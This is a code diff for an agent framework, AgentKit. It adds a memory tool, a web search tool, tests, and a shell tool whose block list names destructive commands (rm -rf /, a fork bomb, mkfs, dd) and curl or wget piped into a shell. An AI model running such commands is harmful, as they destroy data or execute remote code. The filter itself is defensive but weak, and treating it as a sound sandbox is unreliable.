"type": "string",
"description": "Replacement text for replace action",
},
},
"required": ["action", "file"],
},
)
self._store = memory_store
async def execute(self, **kwargs) -> dict[str, Any]:
action = kwargs.get("action", "")
file_key = kwargs.get("file", "")
# Validate
if file_key not in VALID_FILES:
return {"success": False, "error": f"Invalid file: {file_key}. Must be one of {VALID_FILES}"}
if action not in VALID_ACTIONS:
return {"success": False, "error": f"Unknown action: {action}. Must be one of {VALID_ACTIONS}"}
try:
mf = self._store.get_file(file_key)
if action == "read":
content = mf.read()
return {"success": True, "content": content}
elif action == "add":
section = kwargs.get("section", "")
content = kwargs.get("content", "")
if not section:
return {"success": False, "error": "section is required for add action"}
mf.add_section(section, content)
return {"success": True, "message": f"Added to {file_key}/{section}"}
elif action == "replace":
section = kwargs.get("section", "")
old_text = kwargs.get("old_text", "")
new_text = kwargs.get("new_text", "")
if not section:
return {"success": False, "error": "section is required for replace action"}
if not old_text:
return {"success": False, "error": "old_text is required for replace action"}
success = mf.replace_section(section, old_text, new_text)
if not success:
return {"success": False, "error": f"old_text not found in {file_key}/{section}"}
return {"success": True, "message": f"Replaced in {file_key}/{section}"}
elif action == "remove":
section = kwargs.get("section", "")
if not section:
return {"success": False, "error": "section is required for remove action"}
mf.remove_section(section)
return {"success": True, "message": f"Removed {file_key}/{section}"}
return {"success": False, "error": f"Unhandled action: {action}"}
except Exception as e:
return {"success": False, "error": str(e)}

233
src/agentkit/tools/shell.py Normal file
View File

@ -0,0 +1,233 @@
"""ShellTool — 安全的命令行执行工具。
支持白名单命令超时控制工作目录设置
默认白名单包含安全的只读命令可通过配置扩展
"""
import asyncio
import logging
import shlex
from typing import Any
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
# Default allowed commands (safe, read-only)
DEFAULT_ALLOWED_COMMANDS: list[str] = [
"ls", "cat", "head", "tail", "wc", "find", "grep", "rg",
"git", "git log", "git diff", "git show", "git status", "git branch",
"python3", "python", "node", "npm", "pip", "pip3",
"echo", "pwd", "which", "whoami", "date", "uname",
"curl", "wget", # Network fetch (read-only)
"docker", "docker ps", "docker logs",
"pytest", "vitest", "jest", "make",
]
# Dangerous patterns that are always blocked
BLOCKED_PATTERNS: list[str] = [
"rm -rf /", "rm -rf /*", ":(){ :|:& };:",
"mkfs", "dd if=", "> /dev/sd", "chmod 777 /",
]
# Regex patterns for dangerous commands (more flexible matching)
import re
BLOCKED_REGEX_PATTERNS: list[re.Pattern[str]] = [
re.compile(r"curl\s.*\|\s*sh", re.IGNORECASE),
re.compile(r"curl\s.*\|\s*bash", re.IGNORECASE),
re.compile(r"wget\s.*\|\s*sh", re.IGNORECASE),
re.compile(r"wget\s.*\|\s*bash", re.IGNORECASE),
]
class ShellTool(Tool):
"""安全的命令行执行工具。
特性
- 白名单命令过滤可配置
- 超时控制默认 30
- 工作目录设置
- 危险命令拦截
- 输出截断防止 token 膨胀
"""
def __init__(
self,
name: str = "shell",
description: str = "执行命令行命令。支持白名单内的安全命令,有超时控制。",
input_schema: dict[str, Any] | None = None,
output_schema: dict[str, Any] | None = None,
version: str = "1.0.0",
tags: list[str] | None = None,
allowed_commands: list[str] | None = None,
default_timeout: int = 30,
max_output_length: int = 10000,
working_dir: str | None = None,
allow_all: bool = False,
):
super().__init__(
name=name,
description=description,
input_schema=input_schema or self._default_input_schema(),
output_schema=output_schema or self._default_output_schema(),
version=version,
tags=tags or ["shell", "system"],
)
self._allowed_commands = allowed_commands or DEFAULT_ALLOWED_COMMANDS
self._default_timeout = default_timeout
self._max_output_length = max_output_length
self._working_dir = working_dir
self._allow_all = allow_all
@staticmethod
def _default_input_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"command": {
"type": "string",
"description": "要执行的命令",
},
"timeout": {
"type": "integer",
"description": "超时秒数(默认 30",
"default": 30,
},
"working_dir": {
"type": "string",
"description": "工作目录(可选)",
},
},
"required": ["command"],
}
@staticmethod
def _default_output_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"stdout": {"type": "string", "description": "标准输出"},
"stderr": {"type": "string", "description": "标准错误"},
"exit_code": {"type": "integer", "description": "退出码"},
"success": {"type": "boolean", "description": "是否成功exit_code == 0"},
"timed_out": {"type": "boolean", "description": "是否超时"},
"error": {"type": "string", "description": "错误信息(仅失败时)"},
},
}
def _is_command_allowed(self, command: str) -> tuple[bool, str]:
"""检查命令是否在白名单内。"""
command_lower = command.lower().strip()
# Block dangerous patterns first (even in allow_all mode)
for pattern in BLOCKED_PATTERNS:
if pattern in command_lower:
return False, f"Blocked dangerous pattern: {pattern}"
for regex in BLOCKED_REGEX_PATTERNS:
if regex.search(command_lower):
return False, f"Blocked dangerous pattern: {regex.pattern}"
if self._allow_all:
return True, ""
# Extract the base command (first token)
try:
tokens = shlex.split(command)
except ValueError:
return False, "Invalid command syntax"
if not tokens:
return False, "Empty command"
base = tokens[0]
# Also check two-word prefixes like "git log", "docker ps"
two_word = f"{base} {tokens[1]}" if len(tokens) > 1 else ""
for allowed in self._allowed_commands:
if base == allowed or two_word == allowed:
return True, ""
return False, f"Command '{base}' not in allowed list. Allowed: {', '.join(sorted(set(self._allowed_commands)))}"
async def execute(self, **kwargs) -> dict:
"""执行命令行命令。"""
command = kwargs.get("command")
if not command:
return {"error": "command 参数是必需的", "success": False}
timeout = kwargs.get("timeout", self._default_timeout)
working_dir = kwargs.get("working_dir", self._working_dir)
# Security check
allowed, reason = self._is_command_allowed(command)
if not allowed:
return {
"error": f"Command not allowed: {reason}",
"success": False,
"stdout": "",
"stderr": "",
"exit_code": -1,
"timed_out": False,
}
try:
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
cwd=working_dir,
)
try:
stdout_bytes, stderr_bytes = await asyncio.wait_for(
proc.communicate(),
timeout=timeout,
)
timed_out = False
except asyncio.TimeoutError:
proc.kill()
await proc.wait()
return {
"stdout": "",
"stderr": f"Command timed out after {timeout}s",
"exit_code": -1,
"success": False,
"timed_out": True,
}
stdout = stdout_bytes.decode("utf-8", errors="replace")
stderr = stderr_bytes.decode("utf-8", errors="replace")
# Truncate output if too long
truncated = False
if len(stdout) > self._max_output_length:
stdout = stdout[:self._max_output_length] + f"\n... [truncated, {len(stdout)} chars total]"
truncated = True
if len(stderr) > self._max_output_length:
stderr = stderr[:self._max_output_length] + f"\n... [truncated, {len(stderr)} chars total]"
truncated = True
result: dict[str, Any] = {
"stdout": stdout,
"stderr": stderr,
"exit_code": proc.returncode or 0,
"success": (proc.returncode or 0) == 0,
"timed_out": False,
}
if truncated:
result["truncated"] = True
return result
except Exception as e:
logger.error(f"ShellTool execution failed: {command} - {e}")
return {
"error": str(e),
"stdout": "",
"stderr": str(e),
"exit_code": -1,
"success": False,
"timed_out": False,
}

View File

@ -0,0 +1,254 @@
"""WebSearchTool — 通用网页搜索工具。
支持多种搜索后端按优先级自动降级
1. Tavily API需要 API key质量最好
2. Serper API需要 API keyGoogle 搜索结果
3. DuckDuckGo Lite免费无需 API key降级方案
"""
import json
import logging
import re
import urllib.parse
from typing import Any
import httpx
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
class WebSearchTool(Tool):
"""通用网页搜索工具。
支持三种后端按优先级降级
- Tavily API高质量 key
- Serper APIGoogle 结果 key
- DuckDuckGo Lite免费降级方案
"""
def __init__(
self,
name: str = "web_search",
description: str = "搜索互联网信息。返回搜索结果列表,包含标题、链接和摘要。",
input_schema: dict[str, Any] | None = None,
output_schema: dict[str, Any] | None = None,
version: str = "1.0.0",
tags: list[str] | None = None,
tavily_api_key: str | None = None,
serper_api_key: str | None = None,
default_max_results: int = 5,
):
super().__init__(
name=name,
description=description,
input_schema=input_schema or self._default_input_schema(),
output_schema=output_schema or self._default_output_schema(),
version=version,
tags=tags or ["search", "web"],
)
self._tavily_key = tavily_api_key
self._serper_key = serper_api_key
self._default_max_results = default_max_results
@staticmethod
def _default_input_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "搜索关键词",
},
"max_results": {
"type": "integer",
"description": "最大返回结果数(默认 5",
"default": 5,
},
},
"required": ["query"],
}
@staticmethod
def _default_output_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"results": {
"type": "array",
"items": {
"type": "object",
"properties": {
"title": {"type": "string"},
"url": {"type": "string"},
"snippet": {"type": "string"},
},
},
"description": "搜索结果列表",
},
"total": {"type": "integer", "description": "结果总数"},
"backend": {"type": "string", "description": "使用的搜索后端"},
"success": {"type": "boolean", "description": "是否成功"},
"error": {"type": "string", "description": "错误信息(仅失败时)"},
},
}
async def execute(self, **kwargs) -> dict:
"""执行网页搜索。"""
query = kwargs.get("query")
if not query:
return {"error": "query 参数是必需的", "results": [], "total": 0, "success": False}
max_results = kwargs.get("max_results", self._default_max_results)
# Try backends in priority order
if self._tavily_key:
result = await self._search_tavily(query, max_results)
if result.get("success"):
return result
logger.warning(f"Tavily search failed, falling back: {result.get('error')}")
if self._serper_key:
result = await self._search_serper(query, max_results)
if result.get("success"):
return result
logger.warning(f"Serper search failed, falling back: {result.get('error')}")
# Fallback: DuckDuckGo
return await self._search_duckduckgo(query, max_results)
async def _search_tavily(self, query: str, max_results: int) -> dict:
"""Tavily API search."""
try:
async with httpx.AsyncClient(timeout=15) as client:
resp = await client.post(
"https://api.tavily.com/search",
json={
"api_key": self._tavily_key,
"query": query,
"max_results": max_results,
"search_depth": "basic",
},
)
resp.raise_for_status()
data = resp.json()
results = []
for item in data.get("results", [])[:max_results]:
results.append({
"title": item.get("title", ""),
"url": item.get("url", ""),
"snippet": item.get("content", "")[:300],
})
return {"results": results, "total": len(results), "backend": "tavily", "success": True}
except Exception as e:
logger.error(f"Tavily search error: {e}")
return {"error": str(e), "results": [], "total": 0, "success": False}
async def _search_serper(self, query: str, max_results: int) -> dict:
"""Serper API (Google) search."""
try:
async with httpx.AsyncClient(timeout=15) as client:
resp = await client.post(
"https://google.serper.dev/search",
json={"q": query, "num": max_results},
headers={"X-API-KEY": self._serper_key},
)
resp.raise_for_status()
data = resp.json()
results = []
for item in data.get("organic", [])[:max_results]:
results.append({
"title": item.get("title", ""),
"url": item.get("link", ""),
"snippet": item.get("snippet", "")[:300],
})
return {"results": results, "total": len(results), "backend": "serper", "success": True}
except Exception as e:
logger.error(f"Serper search error: {e}")
return {"error": str(e), "results": [], "total": 0, "success": False}
async def _search_duckduckgo(self, query: str, max_results: int) -> dict:
"""DuckDuckGo Lite search (free, no API key needed).
Parses the HTML response from DuckDuckGo Lite.
"""
try:
encoded_query = urllib.parse.quote(query)
url = f"https://lite.duckduckgo.com/lite/?q={encoded_query}"
async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
resp = await client.get(
url,
headers={
"User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/120.0.0.0 Safari/537.36"
),
},
)
html = resp.text
results = self._parse_duckduckgo_html(html, max_results)
return {"results": results, "total": len(results), "backend": "duckduckgo", "success": True}
except Exception as e:
logger.error(f"DuckDuckGo search error: {e}")
return {
"error": f"Search unavailable: {e}",
"results": [],
"total": 0,
"backend": "duckduckgo",
"success": False,
}
@staticmethod
def _parse_duckduckgo_html(html: str, max_results: int) -> list[dict[str, str]]:
"""Parse DuckDuckGo Lite HTML to extract search results."""
results: list[dict[str, str]] = []
# DuckDuckGo Lite uses <a class="result-link"> for titles
# and <td class="result-snippet"> for snippets
# Pattern: find result-link anchors, then find the next snippet
link_pattern = re.compile(
r'<a[^>]*class="result-link"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<td[^>]*class="result-snippet"[^>]*>(.*?)</td>',
re.DOTALL,
)
links = list(link_pattern.finditer(html))
snippets = list(snippet_pattern.finditer(html))
for i, match in enumerate(links):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
# Skip ad/tracking links
if not url.startswith("http") or "duckduckgo.com" in url:
continue
snippet = ""
if i < len(snippets):
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
return results

View File

@ -0,0 +1,102 @@
"""Tests for Chat memory integration — 记忆注入 + MemoryTool + 日志生成 (U4)."""
from pathlib import Path
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
from agentkit.memory.profile import MemoryStore, MemorySnapshot
from agentkit.tools.memory_tool import MemoryTool
class TestChatMemoryInjection:
"""Chat 启动时记忆注入 system prompt 测试."""
def test_memory_store_initializes_with_base_dir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert "<agent-identity>" in prompt
assert "AgentKit" in prompt
assert "Be helpful." in prompt
def test_no_memory_files_returns_base_prompt(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert prompt == "Be helpful."
def test_default_soul_injected(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot)
assert "<agent-identity>" in prompt
assert "专业" in prompt or "AgentKit" in prompt
class TestChatMemoryToolAvailable:
"""MemoryTool 在对话中可用测试."""
async def test_memory_tool_in_tools_list(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
tool = MemoryTool(memory_store=store)
assert tool.name == "memory"
assert tool.input_schema is not None
async def test_memory_tool_add_and_read(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
tool = MemoryTool(memory_store=store)
# Add
result = await tool.execute(action="add", file="user", section="称呼", content="叫我老板")
assert result["success"] is True
# Read
result = await tool.execute(action="read", file="user")
assert "老板" in result["content"]
class TestChatMemoryPersistence:
"""记忆跨 /clear 会话持久化测试."""
def test_memory_survives_session_clear(self, tmp_path: Path):
"""/clear 只清除会话历史,不清除记忆文件."""
store = MemoryStore(base_dir=tmp_path)
store.get_file("user").write("## 称呼\n叫我老板")
# 模拟 /clear — 重新创建 MemoryStore
store2 = MemoryStore(base_dir=tmp_path)
content = store2.get_file("user").read()
assert "老板" in content
def test_memory_persists_across_store_instances(self, tmp_path: Path):
store1 = MemoryStore(base_dir=tmp_path)
store1.get_file("memory").write("## 项目\nAgentKit框架")
store2 = MemoryStore(base_dir=tmp_path)
content = store2.get_file("memory").read()
assert "AgentKit" in content
class TestChatDailyLogGeneration:
"""会话结束时日志生成测试."""
def test_daily_file_path_is_today(self, tmp_path: Path):
from datetime import datetime, timezone
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
assert today in str(daily.path)
def test_write_daily_log(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
daily.write("讨论了AgentKit记忆系统架构")
content = daily.read()
assert "记忆系统" in content
def test_daily_log_loads_in_snapshot(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("daily").write("今天完成了记忆系统开发")
snapshot = store.load_all()
assert "记忆系统" in snapshot.daily

View File

@ -0,0 +1,249 @@
"""Tests for MemoryFile + MemoryStore — 记忆文件读写与多文件管理 (U1+U2)."""
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
class TestMemoryFileBasicIO:
"""MemoryFile 基本读写测试."""
def test_read_nonexistent_file_returns_empty(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "no_such.md")
assert mf.read() == ""
def test_write_and_read_back(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md")
mf.write("hello world")
assert mf.read() == "hello world"
def test_write_creates_parent_dirs(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "deep" / "nested" / "test.md")
mf.write("content")
assert mf.read() == "content"
def test_overwrite_existing(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md")
mf.write("first")
mf.write("second")
assert mf.read() == "second"
class TestMemoryFileSections:
"""MemoryFile section 级别操作测试."""
def _make_file(self, tmp_path: Path, content: str) -> MemoryFile:
mf = MemoryFile(tmp_path / "test.md")
mf.write(content)
return mf
def test_read_section_from_empty_file(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "empty.md")
assert mf.read_section("身份") == ""
def test_read_section_returns_content(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
assert mf.read_section("身份") == "我是小王"
def test_read_section_not_found_returns_empty(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
assert mf.read_section("不存在") == ""
def test_add_section_creates_new(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.add_section("性格", "友好耐心")
assert mf.read_section("性格") == "友好耐心"
assert mf.read_section("身份") == "我是小王"
def test_add_section_appends_to_existing(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.add_section("身份", "也是AI助手")
content = mf.read_section("身份")
assert "我是小王" in content
assert "也是AI助手" in content
def test_replace_section_text(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
mf.replace_section("身份", "我是小王", "我是大王")
assert mf.read_section("身份") == "我是大王"
assert mf.read_section("性格") == "友好耐心"
def test_replace_section_old_not_found_returns_false(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
result = mf.replace_section("身份", "不存在", "新内容")
assert result is False
def test_remove_section(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
mf.remove_section("身份")
assert mf.read_section("身份") == ""
assert mf.read_section("性格") == "友好耐心"
def test_remove_nonexistent_section_no_error(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.remove_section("不存在") # 不抛异常
assert mf.read_section("身份") == "我是小王"
def test_list_sections(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
sections = mf.list_sections()
assert sections == ["身份", "性格"]
class TestMemoryFileCapacity:
"""MemoryFile 容量管理测试."""
def test_trim_to_budget_keeps_content_within_limit(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=20)
mf.write("## 身份\n我是小王一个专业的AI助手") # 超过 20 字符
mf.trim_to_budget()
content = mf.read()
assert len(content) <= 20
def test_trim_preserves_earlier_sections(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=30)
mf.write("## 身份\n我是小王\n## 性格\n友好耐心注重细节") # 性格部分超限
mf.trim_to_budget()
content = mf.read()
assert "身份" in content # 保留前面的 section
def test_no_trim_when_within_budget(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=1000)
mf.write("## 身份\n我是小王")
mf.trim_to_budget()
assert mf.read() == "## 身份\n我是小王"
def test_write_auto_trims(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=15)
mf.write("## 身份\n我是小王一个专业的AI助手非常长")
content = mf.read()
assert len(content) <= 15
class TestMemoryStoreInit:
"""MemoryStore 初始化测试."""
def test_init_creates_base_dir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path / "new_dir")
assert (tmp_path / "new_dir").exists()
def test_init_creates_memories_subdir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert (tmp_path / "memories").exists()
def test_init_creates_daily_subdir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert (tmp_path / "memories" / "daily").exists()
class TestMemoryStoreLoadAll:
"""MemoryStore load_all 测试."""
def test_load_all_returns_snapshot(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
assert isinstance(snapshot, MemorySnapshot)
def test_load_all_empty_when_no_files(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
assert snapshot.is_empty()
def test_load_all_with_content(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
store.get_file("user").write("## 称呼\n叫我老板")
snapshot = store.load_all()
assert "小王" in snapshot.soul
assert "老板" in snapshot.user
assert snapshot.total_chars > 0
class TestMemoryStoreBuildPrompt:
"""MemoryStore build_system_prompt 测试."""
def test_build_prompt_injects_all_sections(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
store.get_file("user").write("## 称呼\n叫我老板")
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert "<agent-identity>" in prompt
assert "小王" in prompt
assert "<user-profile>" in prompt
assert "老板" in prompt
assert "Be helpful." in prompt
def test_build_prompt_no_memory_returns_base_only(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert prompt == "Be helpful."
def test_build_prompt_empty_base_with_memory(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot)
assert "<agent-identity>" in prompt
assert "小王" in prompt
class TestMemoryStoreDefaults:
"""MemoryStore ensure_defaults 测试."""
def test_ensure_defaults_creates_soul(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
soul = store.get_file("soul").read()
assert "AgentKit" in soul
def test_ensure_defaults_no_overwrite(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n自定义内容")
store.ensure_defaults()
soul = store.get_file("soul").read()
assert "自定义内容" in soul
assert "AgentKit" not in soul
class TestMemoryStoreDailyLogs:
"""MemoryStore 日志管理测试."""
def test_load_daily_logs_empty(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert store.load_daily_logs() == ""
def test_load_daily_logs_with_today(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
daily_file = MemoryFile(tmp_path / "memories" / "daily" / f"{today}.md")
daily_file.write("讨论了项目架构")
logs = store.load_daily_logs()
assert "讨论了项目架构" in logs
def test_archive_old_dailies(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
# 创建一个旧日志
old_date = (datetime.now(timezone.utc) - timedelta(days=5)).strftime("%Y-%m-%d")
old_file = tmp_path / "memories" / "daily" / f"{old_date}.md"
old_file.parent.mkdir(parents=True, exist_ok=True)
old_file.write_text("旧日志", encoding="utf-8")
count = store.archive_old_dailies(keep_days=2)
assert count == 1
assert not old_file.exists()
def test_get_file_daily_returns_today(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
assert today in str(daily.path)
def test_get_file_invalid_key_raises(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
with pytest.raises(ValueError, match="Invalid file_key"):
store.get_file("invalid")

View File

@ -0,0 +1,112 @@
"""Tests for MemoryTool — Agent 可调用的记忆操作工具 (U3)."""
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
@pytest.fixture
def store(tmp_path: Path) -> MemoryStore:
return MemoryStore(base_dir=tmp_path)
@pytest.fixture
def tool(store: MemoryStore) -> MemoryTool:
return MemoryTool(memory_store=store)
class TestMemoryToolAdd:
"""memory_add 操作测试."""
async def test_add_creates_new_section(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="add", file="memory", section="项目信息", content="使用Python和FastAPI")
assert result["success"] is True
content = store.get_file("memory").read_section("项目信息")
assert "Python和FastAPI" in content
async def test_add_appends_to_existing_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(action="add", file="memory", section="项目信息", content="还有TypeScript")
assert result["success"] is True
content = store.get_file("memory").read_section("项目信息")
assert "Python" in content
assert "TypeScript" in content
async def test_add_to_soul(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="add", file="soul", section="爱好", content="编程和阅读")
assert result["success"] is True
assert "编程和阅读" in store.get_file("soul").read_section("爱好")
class TestMemoryToolReplace:
"""memory_replace 操作测试."""
async def test_replace_text_in_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
result = await tool.execute(
action="replace", file="memory", section="项目信息",
old_text="Python", new_text="Rust"
)
assert result["success"] is True
assert "Rust" in store.get_file("memory").read_section("项目信息")
assert "3人" in store.get_file("memory").read_section("团队")
async def test_replace_old_not_found_fails(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(
action="replace", file="memory", section="项目信息",
old_text="不存在", new_text="新内容"
)
assert result["success"] is False
assert "not found" in result.get("error", "").lower()
class TestMemoryToolRemove:
"""memory_remove 操作测试."""
async def test_remove_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
result = await tool.execute(action="remove", file="memory", section="项目信息")
assert result["success"] is True
assert store.get_file("memory").read_section("项目信息") == ""
assert "3人" in store.get_file("memory").read_section("团队")
class TestMemoryToolRead:
"""memory_read 操作测试."""
async def test_read_file_content(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(action="read", file="memory")
assert result["success"] is True
assert "Python" in result["content"]
async def test_read_empty_file(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="read", file="memory")
assert result["success"] is True
assert result["content"] == ""
class TestMemoryToolValidation:
"""参数验证测试."""
async def test_invalid_file_key(self, tool: MemoryTool):
result = await tool.execute(action="read", file="invalid")
assert result["success"] is False
assert "Invalid" in result.get("error", "")
async def test_invalid_action(self, tool: MemoryTool):
result = await tool.execute(action="delete_everything", file="memory")
assert result["success"] is False
assert "Unknown action" in result.get("error", "")
async def test_add_respects_capacity(self, tool: MemoryTool, store: MemoryStore):
# memory file has MEMORY_BUDGET=2200
long_content = "A" * 3000
result = await tool.execute(action="add", file="memory", section="测试", content=long_content)
assert result["success"] is True
content = store.get_file("memory").read()
assert len(content) <= 2200

View File

@ -0,0 +1,216 @@
"""Tests for onboarding wizard and chat command."""
from pathlib import Path
from unittest.mock import patch
import yaml
from agentkit.cli.onboarding import (
PROVIDER_PRESETS,
needs_onboarding,
run_onboarding,
)
class TestNeedsOnboarding:
def test_needs_onboarding_when_no_config(self, tmp_path, monkeypatch):
"""Should return True when no config file exists."""
monkeypatch.chdir(tmp_path)
monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False)
assert needs_onboarding() is True
def test_no_onboarding_when_config_exists(self, tmp_path, monkeypatch):
"""Should return False when agentkit.yaml exists."""
config_file = tmp_path / "agentkit.yaml"
config_file.write_text("server:\n port: 8001\n")
monkeypatch.chdir(tmp_path)
assert needs_onboarding(config_arg=str(config_file)) is False
def test_no_onboarding_with_home_config(self, tmp_path, monkeypatch):
"""Should return False when ~/.agentkit/agentkit.yaml exists."""
home_dir = tmp_path / "home"
home_dir.mkdir()
agentkit_dir = home_dir / ".agentkit"
agentkit_dir.mkdir()
(agentkit_dir / "agentkit.yaml").write_text("server:\n port: 8001\n")
monkeypatch.setenv("HOME", str(home_dir))
monkeypatch.chdir(tmp_path / "empty" if (tmp_path / "empty").exists() else tmp_path)
# Create empty cwd to ensure no local config
empty_dir = tmp_path / "empty"
empty_dir.mkdir()
monkeypatch.chdir(empty_dir)
assert needs_onboarding() is False
class TestProviderPresets:
def test_all_presets_have_required_fields(self):
"""Every provider preset must have name, env_key, base_url, models."""
for key, preset in PROVIDER_PRESETS.items():
assert "name" in preset, f"{key} missing name"
assert "env_key" in preset, f"{key} missing env_key"
assert "base_url" in preset, f"{key} missing base_url"
assert "models" in preset, f"{key} missing models"
assert preset["models"], f"{key} has empty models"
assert "default_model" in preset, f"{key} missing default_model"
def test_preset_keys_are_lowercase(self):
"""Provider keys should be lowercase."""
for key in PROVIDER_PRESETS:
assert key == key.lower(), f"Provider key '{key}' should be lowercase"
def test_deepseek_preset(self):
"""DeepSeek preset should have correct configuration."""
ds = PROVIDER_PRESETS["deepseek"]
assert ds["env_key"] == "DEEPSEEK_API_KEY"
assert "deepseek-chat" in ds["models"]
assert ds["type"] == "openai"
def test_qwen_preset(self):
"""Qwen preset should use DashScope endpoint."""
qwen = PROVIDER_PRESETS["qwen"]
assert "dashscope" in qwen["base_url"]
assert qwen["env_key"] == "DASHSCOPE_API_KEY"
class TestRunOnboarding:
def test_onboarding_generates_config_files(self, tmp_path, monkeypatch):
"""Onboarding should generate agentkit.yaml and .env."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
# Mock user input
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Step 1: Select DeepSeek (option 1)
# Step 2: API key
# Step 2b: Select model (1 = deepseek-chat, default)
# Step 5: Agent personality (name, personality, speaking_style)
mock_prompt.ask.side_effect = ["1", "sk-test-deepseek-key", "1", "小王", "友好耐心", "简洁专业"]
# Step 3: No second provider
mock_confirm.ask.return_value = False
config_path = run_onboarding(output_dir=str(tmp_path))
assert config_path is not None
assert Path(config_path).exists()
# Verify agentkit.yaml content
with open(config_path) as f:
config = yaml.safe_load(f)
